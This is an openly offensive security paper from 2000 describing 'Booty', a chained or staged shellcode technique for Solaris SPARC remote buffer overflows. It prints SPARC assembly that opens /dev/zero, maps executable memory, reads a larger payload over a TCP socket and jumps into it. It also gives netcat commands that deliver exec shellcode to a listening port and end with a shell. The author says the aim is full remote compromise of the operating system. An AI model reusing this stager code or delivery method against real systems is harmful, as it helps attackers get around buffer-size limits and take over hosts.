+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [------ Chained Payload Attacks --------------------------------------------] [------ by User Datagram Protocol ------------------------------------------] [------ Sunday December 17th 2000 -------------------------- First Draft ---] -------------[ Table of Contents ]------------------------------------------- ------------------------- -0x00 [ IPR / BSD License ] -0x01 [ Executive Summary ] -0x02 [ Introduction ] -0x03 [ Rationale ] -0x05 [ Tools ] -0x06 [ Code ] -0x07 [ Conclusions ] -0x08 [ References ] -0x0A [ Contact Info ] ------------------------- +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -0x00-------------------[ IPR / BSD License ] This document and its contents are comprised of my own research, and are (c) Copyright 2000 Bruce M. Simpson, All Rights Reserved Worldwide. Redistribution and use in ASCII text format and other formats, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of this document must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in any other format must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. All advertising materials mentioning features or use of this document must display the following acknowledgement: This work is based in part of the work of Bruce M. Simpson. 4. The name of Bruce M. Simpson may NOT be used to endorse or promote works derived from this work without specific prior written permission. No warranty or representation is made regarding the reliability, suitability, or correctness of the information within this document. Use of any code or information within this document is completely at your own risk; Bruce M. Simpson will not be held liable for any form of compensation for financial loss caused directly or indirectly by the use of information within this document. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ -0x01-------------------[ Executive Summary ] Remote buffer overflows are a class of software vulnerability which makes it possible to subvert an application without requiring user credentials for a system. These vulnerabilities have grievous consequences for network security. This paper discusses a new kind of attack payload which can be used to smuggle more code into the victim system. Impact: The attacker could potentially subvert the entire OS kernel in one fell swoop. Amusement: If you've ever used the BBC Micro's 'CHAIN' tape loader command, you'll get this one right away. -0x02-------------------[ Introduction ] Assuming that a networked application is vulnerable to a remote buffer overflow, running on a Solaris platform, with a small buffer size, it may be possible to remotely inject code which is far more hostile than would normally be the case, given the size of the buffer. Buffer size tends to be more of a limitation for SPARC and other RISC architectures. SPARC instruction streams must be aligned to 4-byte boundaries within address space. Chained payloads mean that the disadvantage to the attacker posed by a small buffer size has been lifted. Assuming that the application is running on a firewalled host, and that there isn't /too/ much stateful filtering and/or application layer form checking of requests, the consequences could be extremely dire. The 'bootstrap' shellcode employed within this paper has been named 'Booty'. -0x03-------------------[ Rationale ] This project is intended to be contributory. I'm building up to a climax here- complete remote compromise of a Solaris host, at the *operating system* and perhaps even the *microcode* level, in one decisive action. Note that the same technique can be applied in the case of local vulnerabilities. The attacker, once provided with his/her own address space, and a means of executing that code, can begin to load and position code which perhaps requires relocations. One of the limitations of shell code is that it must have no relocations, and for maximum effectiveness, it should be reentrant and position independent. The technique documented within this paper augments stack-based overflow techniques as well as heap-based and format-based overflow methodologies. I have not directly observed this technique being used in the field. Now that the size limitation on remote shellcode has been lifted, the possibilities are endless. -0x04-------------------[ Tools ] A few tools were prepared for the feast: shxdump -- Dump code in '\xFF' format for inclusion. dump_shellcode.sh -- Wrapper script which invokes shxdump. These can be used to format the assembled shellcode ready for exploit presentation. -0x05-------------------[ Code ] The technique is reasonably simple. Assuming the attacker smashes the stack, or is able to inject and execute a small amount of arbitrary code, and that the process runs with regular user credentials (can allocate memory, can read files, can create a socket etc) then further code may be injected to form the action the attacker really intended. Booty is available in local, remote passive, and remote active flavors. Pick the shellcode delivery platform of your choice. Fire it up. Poison PLTs. This code will be released soon - the most important bits: Open of /dev/zero under Solaris (points to the mm driver module, which actually implements kmem, mem, zero and null): shellcode: ... sethi %hi(devzero_tuple_2),%l0 or %l0,%lo(devzero_tuple_2),%l0 st %l0,[%o0 + 8] mov O_RDWR,%o1 mov _open,%g1 ta 8 st %o0,[%fp + l_p_fd] mov %o0,%l3 ! l3 = dev zero fd Anonymous mmap of /dev/zero to get some VM allocated for you: sub %o0,%o0,%o0 sethi %hi(sizeof_pblock),%o1 or %o1,%lo(sizeof_pblock),%o1 mov PROT_ALL,%o2 sethi %hi(_MAP_NEW),%o3 ! need MAP_NEW or %o3,MAP_PRIVATE,%o3 mov %l3,%o4 clr %o5 mov _mmap,%g1 ta 8 nop mov %o0,%l4 ! l4 -> memory st %o0,[%fp + l_p] And finally, reading the code into your buffer using your preferred shellcode delivery method, in this case, a passive TCP open: loopy: ld [%fp + l_p],%l1 ! l1 -> cur sethi %hi(sizeof_pblock),%l3 mov %l1,%l2 add %l3,%l2,%l2 ! l2 -> end feh: mov %l0,%o0 mov %l1,%o1 mov 2048,%o2 ! 2k blocks. mov _read,%g1 ! Pump it in deep and slowly. ta 8 add %l1,2048,%l1 cmp %l1,%l2 blu,a feh sub %o0,%o0,%o0 fah: ld [%fp + l_p],%o0 ! l1 -> start ld [%fp + l_oldsp],%o1 ! and o1 -> sp as it was call %l4 ! b00m! add %o1,%o1,%o1 ! fill slot, leave stack dirty Boom! Can you guess what I'm going to inject into Solaris in the next paper? --------------------[ Testing the shellcode Compile and fire up the bind()/listen() version of Booty: % ./booty [ shellcode entered at _start, blocking in accept()] Switch to another shell. Verify that the memory has been allocated via the anonymous mapping mechanism: % ps -aef | fgrep booty udp 19745 11261 0 09:27:27 pts/8 0:00 fgrep booty udp 19739 1258 0 09:25:10 pts/21 0:00 ./booty [ pid 19739 ] Inspect the process's memory maps via the /proc filesystem and its tools: % /usr/proc/bin/pmap 19739 19739: ./booty 00010000 4K read/exec dev:32,29 ino:348008 EF7D0000 128K read/write/exec [ anon ] EFFFE000 8K read/write [ stack ] total 140K Now supply the chaining code with 128K of other data, using netcat: % dd if=/dev/random bs=1024 count=128 | nc -w 1 -v -v 0 31338 0: inverse host lookup failed: Unknown host (UNKNOWN) [] 31338 (?) open 128+0 records in 128+0 records out net timeout sent 131072, rcvd 0 Switch to your other shell with Booty running under it: Illegal instruction Exit 132 Now inspect the core file: % adb core file = core -- program ``bootyc'' on platform SUNW,SPARCstation-20 SIGILL: Illegal Instruction $c ?() at ef7d0000 data address not found As you can see, the process has successfully allocated memory, read as much data in at that address as it can, and begun executing it. Experimenting with a piece of tiny shellcode sandwiched on top of some random bytes (let's say p1k has your exece() based Solaris shellcode): % set feh=`ls -l p1k | awk '{print $5}'` % set fuh=`echo "131072 - $feh" | bc` % dd if=/dev/random of=./pUk bs=$fuh count=1 E voila, instant chained attack payload. Now get ready: shell1% ./booty shell2% cat p1k pUk | nc -w 1 -v -v 0 31338 Watch. % cat p1k pUk | nc -v -v 31338 localhost [] 31338 (?) open $ You now have a shell invoked by the chained shellcode. This could potentially be any piece of code, and now, you're no longer limited by the size of that buffer. The scope for abuse is going to be explored further. It is certainly possible for a local exploit to read arbitrary files holding object code for execution, so if you have a large piece of code to e.g. poison the PLT, that would not normally fit into 512 characters, then you can employ chaining to deliver the PLT poisoning code. Further work on this device will explore simulating an ELF exece() purely through the use of position independent, nonrelocated code. -0x06-------------------[ Conclusions ] - Being able to allocate memory from within modern UNIX using the mmap() system call is a real boon. I've used it for building high performance media servers in the past - I never really thought about using it to smash system security before. My how things change! - Countermeasures include domain type enforcement (real mandatory access control), securelevel for Solaris (coming out soon). - This stuff isn't going to fool stochastic analysis based IDS. -0x07-------------------[ References ] ------[ Articles ] P56-07: Shared Library Redirection via ELF PLT Infection P56-14: Exploiting Non-Adjacent Memory Spaces, by twitch ------[ Books ] Advanced Programming in the UNIX Environment by W. Richard Stevens Addison-Wesley, 1992 80386 Assembly Language: A Complete Tutorial and Subroutine Library by Penn Brumm & Don Brumm McGraw-Hill ISBN 0-07-155992-2 ------[ Web ] Hardening the Solaris Kernel, by udp http://www.low-level.net/udp/papers/hardening-solaris.txt Domain and Type Enforcement, SAIC http://research-cistw.saic.com/cace/dte.html udp's home page http://www.low-level.net/udp/ Phrack Magazine http://phrack.infonexus.com/ Solaris Loadable Kernel Modules, The Hacker's Choice http://thc.inferno.tusculum.edu/files/thc/slkm-1.0.html Transparent Run-Time Defense Against Stack Smashing Attacks, Bell Labs http://www.bell-labs.com/org/11356/docs/usenix00/paper.html Hardened 4.4BSD Kernel, Tom Ptacek http://www.enteract.com/~tqbf/harden.html -0x08-------------------[ Acknowledgements ] Thanks and shout-outs to: dalias for bashing the idea out with me on IRC. silvio for extensive exploration of subverting ELF. cripto for kicking my ass into gear. jimjones for assistance and advice. "The look in your eye The pressure, you kill with a knife Toxins and games You- you vow to *win*." -- Front Line Assembly, 'Resist' -0x09-------------------[ Contact Info ] Bruce M. Simpson aka 'udp' Canonical URL for this document: http://www.low-level.net/udp/papers/chained-shellcode.txt This paper would not have been possible had it not been for Nong Shim noodle cups, and Haujobb turned up to 8 to make my ears bleed. +0xFF+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[ EOF ]